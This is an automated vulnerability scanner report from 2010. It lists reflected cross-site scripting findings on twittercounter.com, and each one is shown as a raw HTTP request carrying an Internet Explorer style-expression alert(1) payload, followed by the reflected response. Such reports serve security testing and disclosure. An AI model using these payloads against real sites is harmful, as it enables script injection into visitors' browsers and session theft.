GET /pages/searchbde85"style%3d"x%3aexpression(alert(1))"3d75a5f9c26/ HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:27:35 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23673
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/searchbde85"style="x:expression(alert(1))"3d75a5f9c26/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5d65"style%3d"x%3aexpression(alert(1))"1e83b04d7d0 was submitted in the REST URL parameter 1. This input was echoed as c5d65"style="x:expression(alert(1))"1e83b04d7d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pagesc5d65"style%3d"x%3aexpression(alert(1))"1e83b04d7d0/tweets HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:27:25 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23617
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pagesc5d65"style="x:expression(alert(1))"1e83b04d7d0/tweets" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af25f"style%3d"x%3aexpression(alert(1))"67c9907556 was submitted in the REST URL parameter 2. This input was echoed as af25f"style="x:expression(alert(1))"67c9907556 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/tweetsaf25f"style%3d"x%3aexpression(alert(1))"67c9907556 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:27:28 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/tweetsaf25f"style="x:expression(alert(1))"67c9907556" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec429"style%3d"x%3aexpression(alert(1))"2f1188667db was submitted in the REST URL parameter 1. This input was echoed as ec429"style="x:expression(alert(1))"2f1188667db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pagesec429"style%3d"x%3aexpression(alert(1))"2f1188667db/twitter-widget HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:09 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23838
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pagesec429"style="x:expression(alert(1))"2f1188667db/twitter-widget" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca9e8"style%3d"x%3aexpression(alert(1))"cda656307f6 was submitted in the REST URL parameter 2. This input was echoed as ca9e8"style="x:expression(alert(1))"cda656307f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/twitter-widgetca9e8"style%3d"x%3aexpression(alert(1))"cda656307f6 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:12 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23671
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/twitter-widgetca9e8"style="x:expression(alert(1))"cda656307f6" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cacd"style%3d"x%3aexpression(alert(1))"e4384218a2d was submitted in the REST URL parameter 1. This input was echoed as 3cacd"style="x:expression(alert(1))"e4384218a2d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages3cacd"style%3d"x%3aexpression(alert(1))"e4384218a2d/twitter-widget/history/TheCounter?from=widget&v=2 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:27:49 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23911
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages3cacd"style="x:expression(alert(1))"e4384218a2d/twitter-widget/history/TheCounter" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d993b"style%3d"x%3aexpression(alert(1))"151b57aa3c was submitted in the REST URL parameter 2. This input was echoed as d993b"style="x:expression(alert(1))"151b57aa3c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/twitter-widgetd993b"style%3d"x%3aexpression(alert(1))"151b57aa3c/history/TheCounter?from=widget&v=2 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:27:58 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23753
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/twitter-widgetd993b"style="x:expression(alert(1))"151b57aa3c/history/TheCounter" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 288fc"style%3d"x%3aexpression(alert(1))"8889808bd34 was submitted in the REST URL parameter 3. This input was echoed as 288fc"style="x:expression(alert(1))"8889808bd34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/twitter-widget/history288fc"style%3d"x%3aexpression(alert(1))"8889808bd34/TheCounter?from=widget&v=2 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:28:05 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64245
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/twitter-widget/history288fc"style="x:expression(alert(1))"8889808bd34/TheCounter" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc423"style%3d"x%3aexpression(alert(1))"927c0b4b1e0 was submitted in the REST URL parameter 4. This input was echoed as cc423"style="x:expression(alert(1))"927c0b4b1e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/twitter-widget/history/TheCountercc423"style%3d"x%3aexpression(alert(1))"927c0b4b1e0?from=widget&v=2 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:28:09 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28807
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/twitter-widget/history/TheCountercc423"style="x:expression(alert(1))"927c0b4b1e0" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13abb"style%3d"x%3aexpression(alert(1))"b6da583241b was submitted in the REST URL parameter 1. This input was echoed as 13abb"style="x:expression(alert(1))"b6da583241b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages13abb"style%3d"x%3aexpression(alert(1))"b6da583241b/twittermail HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:18:32 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23681
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages13abb"style="x:expression(alert(1))"b6da583241b/twittermail" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4903d"style%3d"x%3aexpression(alert(1))"eee0a0225fa was submitted in the REST URL parameter 2. This input was echoed as 4903d"style="x:expression(alert(1))"eee0a0225fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/twittermail4903d"style%3d"x%3aexpression(alert(1))"eee0a0225fa HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:18:38 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23882
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/twittermail4903d"style="x:expression(alert(1))"eee0a0225fa" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ef74"style%3d"x%3aexpression(alert(1))"64368237ca1 was submitted in the REST URL parameter 1. This input was echoed as 8ef74"style="x:expression(alert(1))"64368237ca1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages8ef74"style%3d"x%3aexpression(alert(1))"64368237ca1/username_alert HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:09 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages8ef74"style="x:expression(alert(1))"64368237ca1/username_alert" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13039"style%3d"x%3aexpression(alert(1))"91431c9122d was submitted in the REST URL parameter 2. This input was echoed as 13039"style="x:expression(alert(1))"91431c9122d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/username_alert13039"style%3d"x%3aexpression(alert(1))"91431c9122d HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:16 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23723
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/username_alert13039"style="x:expression(alert(1))"91431c9122d" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3996c"style%3d"x%3aexpression(alert(1))"d925b5c1d33 was submitted in the REST URL parameter 1. This input was echoed as 3996c"style="x:expression(alert(1))"d925b5c1d33 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pgoss3996c"style%3d"x%3aexpression(alert(1))"d925b5c1d33 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:28:19 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23712
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pgoss3996c"style="x:expression(alert(1))"d925b5c1d33" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3d3e"style%3d"x%3aexpression(alert(1))"6964e05d6b3 was submitted in the REST URL parameter 1. This input was echoed as c3d3e"style="x:expression(alert(1))"6964e05d6b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /rachelwarlotusc3d3e"style%3d"x%3aexpression(alert(1))"6964e05d6b3 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:28:33 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23845
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/rachelwarlotusc3d3e"style="x:expression(alert(1))"6964e05d6b3" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ac56"style%3d"x%3aexpression(alert(1))"6f228dff827 was submitted in the REST URL parameter 1. This input was echoed as 9ac56"style="x:expression(alert(1))"6f228dff827 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /rafadefine6823659ac56"style%3d"x%3aexpression(alert(1))"6f228dff827 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:11 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23679
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/rafadefine6823659ac56"style="x:expression(alert(1))"6f228dff827" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0788"style%3d"x%3aexpression(alert(1))"f7f7b800463 was submitted in the REST URL parameter 1. This input was echoed as c0788"style="x:expression(alert(1))"f7f7b800463 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /rafadefine682365c0788"style%3d"x%3aexpression(alert(1))"f7f7b800463/list/topbrasil-helphaiti HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:25 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12893
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/rafadefine682365c0788"style="x:expression(alert(1))"f7f7b800463/list/topbrasil-helphaiti" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5bbc"style%3d"x%3aexpression(alert(1))"69d1c54505a was submitted in the REST URL parameter 2. This input was echoed as c5bbc"style="x:expression(alert(1))"69d1c54505a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
